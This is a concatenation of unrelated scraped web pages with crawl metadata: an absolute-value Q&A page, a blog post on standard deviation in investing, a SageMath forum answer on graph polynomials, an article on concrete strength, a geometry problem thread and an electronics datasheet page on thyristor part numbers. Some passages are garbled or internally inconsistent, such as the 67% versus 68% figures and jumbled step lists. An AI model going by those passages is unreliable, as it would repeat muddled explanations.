social networking channels.\n+ Serving banner ads and interstitial ads.", null, "Learn Convex Optimization Full" ]
[ null, "https://3.bp.blogspot.com/-_6HSPLG-ZuY/WzeaK5GZXEI/AAAAAAAALLw/PKCmtodYov4VuSy-t_lgY8LPnLPQMsjxgCLcBGAs/s200/25.png", null, "https://4.bp.blogspot.com/-KgHesWSL-1Q/WzebSAcIsWI/AAAAAAAALL8/Rpk1pDY97vIKX0UOkVtZjCRzQduKWL4PACLcBGAs/s1600/Screenshot_2018-06-29-16-56-42-16.png", null, "https://4.bp.blogspot.com/-M-86ZcumUx8/WzebSTOEd0I/AAAAAAAALMA/sCzFm6_X4H86Fp6fOvqQqmI-h5tOG00DgCLcBGAs/s1600/Screenshot_2018-06-29-16-58-32-83.png", null, "https://4.bp.blogspot.com/-PwFcrpcG7jo/WzebSQFXT4I/AAAAAAAALME/OcYAzEH1W9oUFBF3i12Tv9R3FJF4NPhBQCLcBGAs/s1600/Screenshot_2018-06-29-16-58-47-16.png", null, "https://1.bp.blogspot.com/-7M3u1HEA1VM/WzeSnK_Y11I/AAAAAAAALJU/wkk_6gs5xu4U0eCrwNaEvbMdsMIcKsDkwCEwYBhgL/s200/0-0.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88462615,"math_prob":0.88121545,"size":1563,"snap":"2019-35-2019-39","text_gpt3_token_len":289,"char_repetition_ratio":0.17447081,"word_repetition_ratio":0.01746725,"special_character_ratio":0.17978247,"punctuation_ratio":0.12156863,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98822755,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,3,null,3,null,3,null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-21T00:56:17Z\",\"WARC-Record-ID\":\"<urn:uuid:c514eb42-819c-49b0-9dcb-52f0eba1a22f>\",\"Content-Length\":\"218229\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2ad972e5-d3a3-4e1c-b8e0-97076b71b391>\",\"WARC-Concurrent-To\":\"<urn:uuid:9d2bb80a-75c9-4cf4-8eea-fe9c7bae9e97>\",\"WARC-IP-Address\":\"172.217.7.243\",\"WARC-Target-URI\":\"https://www.booksfree.mobi/2018/06/learn-convex-optimization-full.html\",\"WARC-Payload-Digest\":\"sha1:CRMGJBO6V3FXJXM27FJUG4V3XWP3XNSG\",\"WARC-Block-Digest\":\"sha1:GAVWAYCRRJOYNPJP76SX6DKWXYCAVQWH\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514574159.19_warc_CC-MAIN-20190921001810-20190921023810-00193.warc.gz\"}"}
https://kartalozelders.com/qa/question-what-is-the-absolute-value-of-5-by-8.html
[ "", null, "# Question: What Is The Absolute Value Of 5 By 8?\n\n## How do you find the absolute value?\n\nThe symbol for absolute value is two straight lines surrounding the number or expression for which you wish to indicate absolute value.|6| = 6 means the absolute value of 6 is 6.|-6| = 6 means the absolute value of -6 is 6.|-2 – x| means the absolute value of -2 minus x.More items…•.\n\n## How do you remove absolute value?\n\nTo solve an equation containing absolute value, isolate the absolute value on one side of the equation. Then set its contents equal to both the positive and negative value of the number on the other side of the equation and solve both equations.\n\n## What is the rule of absolute value?\n\nIn mathematics, the absolute value or modulus of a real number x, denoted |x|, is the non-negative value of x without regard to its sign. Namely, |x| = x if x is positive, and |x| = −x if x is negative (in which case −x is positive), and |0| = 0.\n\n## How do you get rid of an absolute value inequality?\n\nRemove the absolute value bars by setting up a compound inequality….Step 1: Isolate the absolute value|2x – 1| – 7 ³ -3 |2x – 1| ³ 4Step 2: Is the number on the other side a negative number?No, it’s a positive number, 4. We’ll move on to step 3.2 more rows\n\n## Do all absolute value equations have two solutions?\n\nYou begin by making it into two separate equations and then solving them separately. An absolute value equation has no solution if the absolute value expression equals a negative number since an absolute value can never be negative.\n\n## What is the absolute value of a positive number?\n\nThe absolute value of a number is its value regardless of its sign. When we take the absolute value of a number, it is always either positive or zero. If the original value is already positive or zero, the absolute value is the same. If the original value is negative, we simply drop the sign.\n\n## What is the absolute value of − 5?\n\nExplanation: The absolute value of -5: |−5| is the absolute value of a negative number. To find the answer to this, you simply remove the negative sign, so the answer is 5 .\n\n## What is the absolute value of 8?\n\n1 Answer. The absolute value of 8 is 8 .\n\n## What is the absolute value of |- 9?\n\nThe absolute value of −9 is 9. The absolute value of 3 is 3. The absolute value of 0 is 0. The absolute value of −156 is 156.\n\n## How do you do absolute value problems?\n\nSOLVING EQUATIONS CONTAINING ABSOLUTE VALUE(S)Step 1: Isolate the absolute value expression.Step2: Set the quantity inside the absolute value notation equal to + and – the quantity on the other side of the equation.Step 3: Solve for the unknown in both equations.Step 4: Check your answer analytically or graphically.\n\n## What is absolute value graph?\n\nThe general form of the absolute value function is: f(x) = a|x-h|+k. When “a” is negative, the V-shape graph opens downward and the vertex is the maximum. When “a” is positive, the V-shape graph opens upward and the vertex is a minimum.\n\n## Why is absolute value important?\n\nWhen you see an absolute value in a problem or equation, it means that whatever is inside the absolute value is always positive. Absolute values are often used in problems involving distance and are sometimes used with inequalities. … That’s the important thing to keep in mind it’s just like distance away from zero." ]
[ null, "https://mc.yandex.ru/watch/69937915", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8332351,"math_prob":0.9981514,"size":3729,"snap":"2021-04-2021-17","text_gpt3_token_len":892,"char_repetition_ratio":0.30442953,"word_repetition_ratio":0.15697674,"special_character_ratio":0.2461786,"punctuation_ratio":0.1126943,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9980006,"pos_list":[0,1,2],"im_url_duplicate_count":[null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-01-17T19:23:50Z\",\"WARC-Record-ID\":\"<urn:uuid:93327ddd-f8cd-4724-8628-7ae0e4c91851>\",\"Content-Length\":\"31035\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9b49f6f5-67ce-4f48-958d-b19c1cfeebc5>\",\"WARC-Concurrent-To\":\"<urn:uuid:95d4f92c-c6cc-42d5-a4e7-f852b6605395>\",\"WARC-IP-Address\":\"45.130.40.27\",\"WARC-Target-URI\":\"https://kartalozelders.com/qa/question-what-is-the-absolute-value-of-5-by-8.html\",\"WARC-Payload-Digest\":\"sha1:QA2AW7U4674VDRJ7NM2UBAUAEYKZO7LM\",\"WARC-Block-Digest\":\"sha1:XXRI2CHVI5YVBHX5VPJ4Z7FSDSYYPR3C\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-04/CC-MAIN-2021-04_segments_1610703513144.48_warc_CC-MAIN-20210117174558-20210117204558-00520.warc.gz\"}"}
https://aptainvestmentgroup.com/how-to-use-standard-deviation-in-investing/
[ "", null, "# How to Use Standard Deviation in Investing\n\nWhen you are investing, you are often looking for investments with the lowest potential risk and the highest potential returns. More risk usually means a higher return; however, it can also mean bigger losses. To help minimize your risk and maximize returns, you can use standard deviation in investing: a tool that helps investors measure the historical volatility of investments. The importance of this lies in the principle that losses hurt more than gains help.\n\nLearn How to Beat the Stock Market – Watch Our Webinar\n\n## What is Standard Deviation?\n\nAs a physician, you’re likely familiar with statistical concepts like standard deviation. You may use them in academia, medicine, and finance. But did you know this term is just as important for investing?\n\nStandard deviation is a statistical model that measures market volatility and, in turn, the risk which measures how widely prices are dispersed from the average price. Standard deviation isn’t necessarily a term that professionals talk about on a regular basis like the P/E ratio, dividend yields, and expense ratios, however, it is one calculation that is used to analyze and determine the historic risk of a particular investment of your portfolio.\n\nThe greater the standard deviation, the more dispersed range of returns an investor can expect. A smaller standard deviation predicts more consistent returns. A higher standard deviation doesn’t guarantee great returns: rather, this indicates a greater risk, but greater potential returns. A smaller standard deviation is less volatile and risky but is unlikely to deliver extraordinary returns.\n\n## How Standard Deviation in Investing is Used to Determine Risk\n\nAnalyzing standard deviations helps show which investments have long-term stability. Below are two example investments:\n\nInvestment 1:\n\nAverage Rate of Return: 10%\n\nStandard Deviation: 5%\n\nInvestment 2:\n\nAverage Rate of Return: 10%\n\nStandard Deviation: 12%\n\nLet’s compare their performance:\n\nBoth investments have the same average rate of return, though with different standard deviations. Investment 2 has a higher standard deviation, which can potentially mean within one standard deviation or 67% of the time that you could earn up to 22% this year but lose 2% next year. That indicates and reflects the investment’s much higher volatility. Even though the average returns are the same, there is still a higher chance of dramatic swings in your investment. Because Investment 1 has the same average rate of return but a lower standard deviation, it is safer and has less risk.  Remember, losses hurt more than gains help, so Investment 1 returns more in the long term.\n\nLong-term investments are key to financial freedom. So, determining the standard deviation is an excellent way to calculate your future portfolio and to determine if your current investments are too risky, too conservative, or just right.", null, "The left graph is a high standard deviation, so it may reach a higher return, but because it’s riskier, it’s just as likely to result in losses. On the right is a low standard deviation—less risk of losses.\n\n## How to Calculate Standard Deviation\n\n#### Step 1: Calculate Average Returns\n\nAn investment’s standard deviation is calculated by measuring the fluctuation of the average return over a period of time.  In this example, we have used 36 months. To find the average, add up the 36 monthly returns and divide by 36.\n\nExample: Average Returns = (-1.31 + 4.23 + 5.32 + -1.11 +…) / 36 = 2.30\n\n#### Step 2: Determine the Square of the Difference Between the Monthly Return and the Average Return\n\nOnce you have the average return, you need to find the square difference between the actual rate of return and the average rate of return for each month.\n\nFor Example: Let’s say we take an actual rate of return from the above equation, –1.31, and make that return for January.\n\nSo, in January, it would be (-1.31 – 2.30)2 = 13.03 and February would be (4.23 – 2.30)2 = 3.72\n\nRepeat this process for all 36 months and then add them all together (13.03 + 3.72 +…) = 162\n\n#### Step 3: Divide the Results\n\nDivide the amount from step 2 by the number of data points minus one: 162 / (36 – 1) = 4.62\n\n#### Step 4: Take the Square Root\n\nThen finally take the square root of the result to find the standard deviation.\n\n√4.62 = 2.15%\n\nOne standard deviation above and below the average return means that 68% of the time, your returns are within that range.  For two standard deviations, that percentage is 95% and three standard deviations that percentage is 99.7%.\n\n## Apta Properties, Your Investment Experts\n\nLong-term investments like multifamily real estate offer many benefits, one of them being great returns while being a low standard deviation investment. Adding multifamily investing to your portfolio is one of the best ways to ensure growth—especially in times of economic turbulence. When it comes to your long-term investments, it’s important to remember they take time to grow and develop into a healthy and secure nest egg. You may not see the returns immediately, but in the long run, they are more consistent and stable than other types of investments.\n\nWhen it comes to investing in your future, Apta Properties is here to help guide you through the journey to financial freedom. If you want to learn more about different types of investments and how to live your best life through passive income, schedule a consultation with our team today!", null, "" ]
[ null, "https://aptainvestmentgroup.com/wp-content/uploads/2023/02/20230222_AAP_StandardDeviationinInvesting.png", null, "https://aptainvestmentgroup.com/wp-content/uploads/2023/02/20230222_AAP_StandardDeviationGraphic-1024x512.png", null, "https://aptainvestmentgroup.com/wp-content/uploads/2023/09/Banner3.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92149174,"math_prob":0.9429266,"size":5164,"snap":"2023-40-2023-50","text_gpt3_token_len":1092,"char_repetition_ratio":0.18100776,"word_repetition_ratio":0.011764706,"special_character_ratio":0.21882261,"punctuation_ratio":0.11507128,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97338796,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-27T21:16:17Z\",\"WARC-Record-ID\":\"<urn:uuid:4f924162-1fc7-4262-bcc2-1b5954bfdf88>\",\"Content-Length\":\"42733\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:59f1e583-9802-4595-918c-757a8d03d906>\",\"WARC-Concurrent-To\":\"<urn:uuid:58e5b4bc-7f24-4ff6-931b-be5cfda4aa37>\",\"WARC-IP-Address\":\"172.67.156.103\",\"WARC-Target-URI\":\"https://aptainvestmentgroup.com/how-to-use-standard-deviation-in-investing/\",\"WARC-Payload-Digest\":\"sha1:M2HPARXWVIQOE5HVVZR5ZBPU3OABE7JS\",\"WARC-Block-Digest\":\"sha1:XF5HVEXOQQE7YOMOO2VHXWWJULBPFSTR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510326.82_warc_CC-MAIN-20230927203115-20230927233115-00149.warc.gz\"}"}
https://ask.sagemath.org/question/66932/graph-polynomial-construction/
[ "# Graph polynomial construction\n\nI wish to construct the graph polynomial (as given here) of any given graph. To do so, I wrote the following code. But, the output was null. What needs to be modified in the following code to get the appropriate graph polynomial (the product of binomials corresponding each edge):\n\n def grappoly(G):\nR=PolynomialRing(ZZ,['x_'+str(k) for k in G.vertices()])\nR.inject_variables()\nfor i in G.vertices():\nfor j in G.vertices():\nP=1\nif set((i,j)).intersection(set(G.edges()))==(i,j):\nP=('x_'+str(i)-'x_'+str(j))*P\nreturn P\nX=graphs.CompleteBipartiteGraph(5,5)\ngrappoly(X)\n\n\nThanks beforehand.\n\nedit retag close merge delete\n\nSort by » oldest newest most voted\n\nThe code required the following modifications after which it worked smoothly:\n\ndef grappoly(G):\nR=PolynomialRing(ZZ,['x_'+str(k) for k in G.vertices()])\nR.inject_variables()\nP=1\nfor i,j in G.edges(labels=false):\nP=(R('x_'+str(i))-R('x_'+str(j)))*P\nreturn P\nX=graphs.CompleteBipartiteGraph(5,5)\ngrappoly(X)\n\nmore\n\n1\n\nf'x_{k}' looks a bit nicer than 'x_'+str(k)\n\n1\n\nUse G.edges(labels=False, sort=False) to avoid deprecation warning. You can also use for k in G instead of for k in G.vertices()." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7764083,"math_prob":0.9304268,"size":613,"snap":"2023-14-2023-23","text_gpt3_token_len":164,"char_repetition_ratio":0.12643678,"word_repetition_ratio":0.0,"special_character_ratio":0.26916802,"punctuation_ratio":0.16793893,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9997209,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-31T09:58:32Z\",\"WARC-Record-ID\":\"<urn:uuid:dfa4fbf5-a629-4718-8957-c64473f66c54>\",\"Content-Length\":\"56200\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:03e17ac4-ce86-4fe5-ae90-723d2a60f41b>\",\"WARC-Concurrent-To\":\"<urn:uuid:cdbc5bc6-4db7-4b4d-97f5-b7c19c0796c2>\",\"WARC-IP-Address\":\"194.254.163.53\",\"WARC-Target-URI\":\"https://ask.sagemath.org/question/66932/graph-polynomial-construction/\",\"WARC-Payload-Digest\":\"sha1:GTGHWJKEDNVMZP6KABOXBY2G5SON4OBT\",\"WARC-Block-Digest\":\"sha1:5AOYAE3YRHXN762A53IMVBO5EROGVMP3\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296949598.87_warc_CC-MAIN-20230331082653-20230331112653-00708.warc.gz\"}"}
http://constructioncost.co/concrete-strength-is-impacted-with-different-factors.html
[ "# How concrete strength is impacted with different factors", null, "The strength of concrete is impacted by various factors. The details are given below :-\n\nConcrete porosity: Air and water are the useful substances to fill up voids in concrete. Air voids belong to pores in concrete. When concrete is blended it contains air trapped in the mix. The vibrators are used to clear out the air at the time of pouring walls.\n\nIf the concrete is less porous, it’s strength will be increased and calculated with compressive strength. The most crucial source of porosity in concrete refers to the proportion of water to cement in the mix, called the ‘water to cement ratio’.\n\nFactors water/cement ratio: It is described as the mass of water divided by the mass of cement in a mix. As for instance, in a concrete mix if there are 400kg cement and 240litres(=240kg) of water, the water/cement ratio will be 240/400=0.6. The water cement ratio is shortened as ‘w/c ratio’ or just ‘w/c’. In mixes where the w/c is in excess of roughly 0.4, all the cement can, in theory, react with water to develop cement hydration products. If the w/c ratios are greater, it follows that the space occupied by the supplementary water over w/c=0.4 will persist as pore space filled with water, or with air when the concrete becomes dry.\n\nAs a result, when the w/c ratio become higher, the porosity of the cement paste in the concrete also upsurges. With the higher porosity, the compressive strength of the concrete will reduce.\n\nStability of aggregate: It is inevitable that when the aggregate in concrete is feeble, the concrete also becomes feeble. Rocks like chalk that contain low intrinsic strength, are not appropriate to be utilized as aggregate.\n\nAggregate-paste bond: The strength of the bond among the paste and the aggregate is vital. When no bond exists, the aggregate practically reproduces a void and the strength of concrete is decreased.\n\nCement-related parameters: Various parameters pertaining to the formation of the individual cement minerals and their ratios in the cement can impact the rate of strength growth and the final strengths gained.", null, "" ]
[ null, "http://assets.pinterest.com/images/pidgets/pinit_fg_en_rect_red_20.png", null, "http://constructioncost.co/images/img/concrete-strength.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92407364,"math_prob":0.9516316,"size":2197,"snap":"2020-10-2020-16","text_gpt3_token_len":469,"char_repetition_ratio":0.17054264,"word_repetition_ratio":0.0,"special_character_ratio":0.20710059,"punctuation_ratio":0.10697675,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9660325,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-22T22:00:37Z\",\"WARC-Record-ID\":\"<urn:uuid:12d6b840-1036-4167-80e7-ad23cefbe113>\",\"Content-Length\":\"27249\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:54e3d2e3-c3e2-41d2-9f37-f945a0f86895>\",\"WARC-Concurrent-To\":\"<urn:uuid:6a46df34-a304-4d59-9583-f6b5c3c48007>\",\"WARC-IP-Address\":\"107.180.48.200\",\"WARC-Target-URI\":\"http://constructioncost.co/concrete-strength-is-impacted-with-different-factors.html\",\"WARC-Payload-Digest\":\"sha1:IFWEFZDVIUJO5GTDCPEFAUDVBH4IT3ON\",\"WARC-Block-Digest\":\"sha1:NPMUHRA26GVIYCBUZBB2F6OVZG2ZNPGV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875145729.69_warc_CC-MAIN-20200222211056-20200223001056-00451.warc.gz\"}"}
https://web2.0calc.com/questions/geo-prob_8
[ "+0\n\n# geo prob\n\n0\n50\n2\n\nAngle BAC= 60 and agnle ABC = 45. Angle bisector of BAC meets BC at T.  If AT = 40, what is the area of triangle ABC?", null, "Dec 7, 2020\n\n#1\n+2\n\nAngle CAT  = 30   Angle TAB  = 30  Angle ABC  = 45   Angle ACB  = 180 - 60 - 45  = 75\n\nSo angle  ATB   = 180  - 30 - 45 =   105\n\nSo angle  ATC  =180 - 105  =  75\n\nUsing the  Law of  Sines we have  that\n\nAT / sin ABC =   AB /sin ATB\n\n40 / sin 45  = AB/ sin 105\n\nAB  =  40 sin105 / sin45  = 20 ( 1 + sqrt (3) )\n\nSince angle  ACB  = angle ATC.....then  AT =  AC = 40\n\nSo area  of ABC  =  (1/2) AC * AB  sin (CAB)   =\n\n(1/2) 40 [ 20 (1 +  sqrt (3) ) ] [ sin 60]  =\n\n20 [ 20 (1 + sqrt (3)  ] sqrt (3)  / 2  =\n\n200 ( 1 + sqrt (3) )  (sqrt (3) )  =\n\n200 ( 3 + sqrt (3) )  ≈  946.4 units^2", null, "", null, "", null, "Dec 7, 2020\n#2\n+2\n\nAngle BAC= 60 and angle ABC = 45. The angle bisector of BAC meets BC at T.  If AT = 40, what is the area of triangle ABC?\n\nCF = TF = sin(15º) * 40\n\nAF = cos(15º) * 40\n\n[ABC] = 1/2 (AF*CF + BF*AF)", null, "Dec 7, 2020" ]
[ null, "https://web2.0calc.com/api/ssl-img-proxy", null, "https://web2.0calc.com/img/emoticons/smiley-cool.gif", null, "https://web2.0calc.com/img/emoticons/smiley-cool.gif", null, "https://web2.0calc.com/img/emoticons/smiley-cool.gif", null, "https://web2.0calc.com/api/ssl-img-proxy", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.57778794,"math_prob":0.99975187,"size":638,"snap":"2021-04-2021-17","text_gpt3_token_len":272,"char_repetition_ratio":0.18611987,"word_repetition_ratio":0.046242774,"special_character_ratio":0.5689655,"punctuation_ratio":0.07092199,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99994564,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-01-21T12:44:38Z\",\"WARC-Record-ID\":\"<urn:uuid:a89c11c2-345c-4591-8a82-732be9b1dc6d>\",\"Content-Length\":\"24029\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a61b7941-a07c-4696-a79e-533ca1584c34>\",\"WARC-Concurrent-To\":\"<urn:uuid:69b673c2-95cd-4aa4-8eb2-9eb441dce990>\",\"WARC-IP-Address\":\"168.119.149.252\",\"WARC-Target-URI\":\"https://web2.0calc.com/questions/geo-prob_8\",\"WARC-Payload-Digest\":\"sha1:G6KHW5RLYLN4Y2IZFXR5ENWQJEZFCKQL\",\"WARC-Block-Digest\":\"sha1:BXALMYDGGFA36QZT2KEEADM66IYGW5MM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-04/CC-MAIN-2021-04_segments_1610703524743.61_warc_CC-MAIN-20210121101406-20210121131406-00675.warc.gz\"}"}
https://researchnow.flinders.edu.au/en/publications/an-invariant-for-hypersurfaces-in-prime-characteristic
[ "# An invariant for hypersurfaces in prime characteristic\n\nDavid Glynn\n\nResearch output: Contribution to journalArticlepeer-review\n\n1 Citation (Scopus)\n\n## Abstract\n\nA hypersurface of order (n + 1)(p h - 1) in projective space of dimension n of prime characteristic p has an invariant monomial. This implies that a hypersurface of order (n+1)(p h-1)-1 determines an invariant point. A hypersurface of order d < n+ 1 in a projective space of dimension n of characteristic two has an invariant set of subspaces of dimension d-1 determined by one linear condition on the Grassmann coordinates of the dual subspaces.\n\nOriginal language English 881-883 3 Siam Journal on Discrete Mathematics 26 3 https://doi.org/10.1137/110823274 Published - 2012\n\n## Keywords\n\n• Geometric code\n• Hypersurface\n• Invariant\n• Linear complex\n• Nucleus\n• Prime\n• Projective space" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.71225065,"math_prob":0.40895152,"size":756,"snap":"2021-21-2021-25","text_gpt3_token_len":195,"char_repetition_ratio":0.11702128,"word_repetition_ratio":0.033613447,"special_character_ratio":0.25,"punctuation_ratio":0.024390243,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96729636,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-10T01:13:04Z\",\"WARC-Record-ID\":\"<urn:uuid:4abd12c4-7e9a-4a60-a26d-fb89bf066e16>\",\"Content-Length\":\"41748\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1040cca7-b3ca-46dd-875b-f308eab6ffcb>\",\"WARC-Concurrent-To\":\"<urn:uuid:8601f1ea-3864-4228-96b7-8fd028b022fe>\",\"WARC-IP-Address\":\"18.139.148.124\",\"WARC-Target-URI\":\"https://researchnow.flinders.edu.au/en/publications/an-invariant-for-hypersurfaces-in-prime-characteristic\",\"WARC-Payload-Digest\":\"sha1:DJ5YTNGWBFH5SVXQCYRY44KT2CTVDCJI\",\"WARC-Block-Digest\":\"sha1:LPBQ6JLOWQLRB4YEDZPW23S3HZLHZNBT\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243989030.65_warc_CC-MAIN-20210510003422-20210510033422-00460.warc.gz\"}"}
http://html.datasheetbank.com/datasheet-html/313187/TECCOR/10page/Q2006LT.html?lang=en
[ "# Q2006LT View Datasheet(PDF) - Teccor Electronics\n\nPart Name\nDescription\nMFG CO.\nQ2006LT", null, "Teccor Electronics", null, "Q2006LT Datasheet PDF : 223 Pages", null, "Description of Part Numbers\nSensitive Triac\nL 20 04 F\nDevice Type\nL = Sensitive Triac\nVoltage Rating\n20 = 200 V\n40 = 400 V\n60 = 600 V\nCurrent Rating\nX8 = 0.8 A\nN=1A\n01 = 1 A\n04 = 4 A\n06 = 6 A\n08 = 8 A\nPackage Type\nBlank = Compak (Surface Mount)\nD = TO-252 (Surface Mount)\nE = TO-92 (Isolated)\nF = TO-202 (Non-islolated)\nL = TO-220 (Isolated)\nV = TO-251 (Non-islolated)\n5 12 X\nSpecial Options\nV = 4000 V Isolation\n(TO-220 Package Only)\nTO-202\nTO-220\nTO-92\nGate Variations\n3 = 3 mA (Q I, II, III, IV)\n5 = 5 mA (Q I, II, III, IV)\n6 = 5 mA (Q I, II, III)\n6 = 10 mA (Q IV)\n8 = 10 mA (Q I, II, III)\n8 = 20 mA (Q IV)\nQ 20 04 L T H 52 X\nDevice Type\nVoltage Rating\n20 = 200 V\n40 = 400 V\n60 = 600 V\nCurrent Rating\n04 = 4 A\n06 = 6 A\n08 = 8 A\n10 = 10 A\n15 = 15 A\nSpecial Options\nV = 4000 V Isolation\n(TO-220 Package Only)\nTO-220\nAlternistor\nGate Variation\nT = Internal Diac Trigger\nPackage Type\nL = TO-220 (Isolated)\nTriac and Alternistor\nQ 20 04 F 3 1 X\nDevice Type\nQ = Triac or Alternistor\nVoltage Rating\n20 = 200 V\n40 = 400 V\n60 = 600 V\n80 = 800 V\nK0 = 1000 V\nCurrent Rating\nX8 = 0.8 A\n01 = 1 A\n04 = 4 A\n06 = 6 A\n08 = 8 A\n10 = 10 A\n12 = 12 A\n15 = 15 A\n25 = 25 A\n30 = 30 A\n35 = 35 A\n40 = 40 A\nPackage Type\nD = TO-252 (Surface Mount)\nE = TO-92 (Isolated)\nF = TO-202 (Non-isolated)\nJ = TO-218X (Isolated)\nK = TO-218 (Isolated)\nL = TO-220 (Isolated)\nN = TO-263 (Surface Mount)\nP = Fastpak (Isolated)\nR = TO-220 (Non-isolated)\nV = TO-251 (Non-isolated)\nW = TO-218X (Non-isolated)\nSpecial Options\nV = 4000 V Isolation\n(TO-220 Package Only)\nTO-202\nTO-220\nTO-92\nTO-218X\nTO-218\nGate Variation\nDH3 and VH3 = 10mA (Q I, II, III)\n3 = 10 mA (Q I, II, III)\nH3 = 20mA (Q I, II, III)\n4 = 25 mA (Q I, II, III)\nH4 = 35 mA (Q I, II, III) *\n5 = 50 mA (Q I, II, III)\nH5 = 50 mA (Q I, II, III) *\n6 = 80 mA (Q I, II, III) *\n7 = 100 mA (Q I, II, III) *\n* NOTE:\nAlternistor device; no Quadrant IV operation\nSensitive SCR\nS 20 06 F S2 21 X\nDevice Type\nS = Sensitive SCR\nSpecial Options\nV = 4000 V Isolated\n(TO-220 Package Only)\nVoltage Rating\n20 = 200 V\n40 = 400 V\n60 = 600 V\nCurrent Rating\nX8 = 0.8 A\nN=1A\n06 = 6 A\n08 = 8 A\n10 = 10 A\nTO-202\nTO-220\nGate Variations\nS1 = 50 µA\nS2 = 200 µA\nS3 = 500 µA\nPackage Type\nBlank = Compak (Surface Mount)\nD = TO-252 (Surface Mount)\nF = TO-202 (Non-islolated)\nL = TO-220 (Isolated)\nV = TO-251 (Non-islolated)\nEC 103 D\nDevice Type\nTCR = TO-92 (Isolated)\nEC = TO-92 (Isolated)\nT = TO-202 (Non-isolated)\n2N = JEDEC (Isolated)\nCurrent Rating for TCR\n22 = 1.5 A\nCurrent Rating for EC\n103 = 0.8 A\nCurrent Rating for T\n106 = 4 A (IGT = 200 µA)\n107 = 4 A (IGT = 500 µA)\nCurrent Rating for 2N\n5xxx = 0.8 A\n1 75\nTO-92\nTO-202\nGate Current (for EC series only)\nNone = 200 µA\n1 = 12 µA\n2 = 50 µA\n3 = 500 µA\nVoltage Rating for TCR\n-4 = 200 V\n-6 = 400 V\n-8 = 600 V\nVoltage Rating for EC and T\nB = 200 V\nD = 400 V\nM = 600 V\nVoltage Rating for 2N\n5064 = 200 V\n6565 = 400 V\nhttp://www.teccor.com\n+1 972-580-7777\nP-6" ]
[ null, "http://www.datasheetbank.com/logo/TECCOR.gif", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "http://html.datasheetbank.com/datasheet-html/313187/TECCOR/10/page/Q2006LT.png", null ]
